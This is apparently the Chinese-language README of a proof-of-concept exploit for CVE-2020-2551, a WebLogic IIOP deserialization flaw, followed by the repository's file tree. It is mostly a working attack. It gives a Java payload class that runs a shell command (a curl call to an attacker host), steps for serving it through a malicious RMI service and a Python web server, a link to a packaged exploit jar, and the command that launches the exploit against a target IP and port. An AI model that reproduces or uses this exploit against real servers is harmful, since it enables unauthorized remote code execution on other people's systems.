Weblogic IIOP CVE-2020-2551## CVE-2020-2551
Weblogic IIOP 反序列化
## 测试环境
Weblogic10.3.6+jdk1.6
[打包好的jar包](https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg) 提取码:a6ob
## 漏洞利用
下载jar包,然后使用marshalsec起一个恶意的RMI服务,本地编译一个exp.java
```java
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
**尽量使用和weblogic相同的jdk版本和依赖库(wlfullclient.jar)编译** 然后本地起一个web服务器
```
python -m http.server --bind 0.0.0.0 80
```
命令行运行jar包
```
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
```
实际效果如图

## 已知问题
很多小伙伴都说复现不成功,看了网上的一些文章发现IIOP存在nat模式的问题,今天发现先知上有了 https://xz.aliyun.com/t/7498 各位自行移步。
## 参考
https://y4er.com/post/weblogic-cve-2020-2551/
[4.0K] /data/pocs/1c1b33ef00131b124e4ea87dfbf94715a6d36d87
├── [1.2K] build.xml
├── [ 75] Makefile
├── [1.2K] README.md
├── [4.0K] src
│ ├── [4.0K] com
│ │ └── [4.0K] payload
│ │ └── [4.0K] Main.java
│ ├── [ 301] exp.java
│ ├── [4.0K] lib
│ │ ├── [ 53K] com.bea.core.repackaged.apache.commons.logging_1.2.1.jar
│ │ ├── [1.7M] com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar
│ │ ├── [ 15K] permit-reflect-0.3.jar
│ │ └── [ 52M] wlfullclient.jar
│ └── [4.0K] META-INF
│ └── [ 52] MANIFEST.MF
└── [ 484] weblogic_CVE_2020_2551.iml
5 directories, 11 files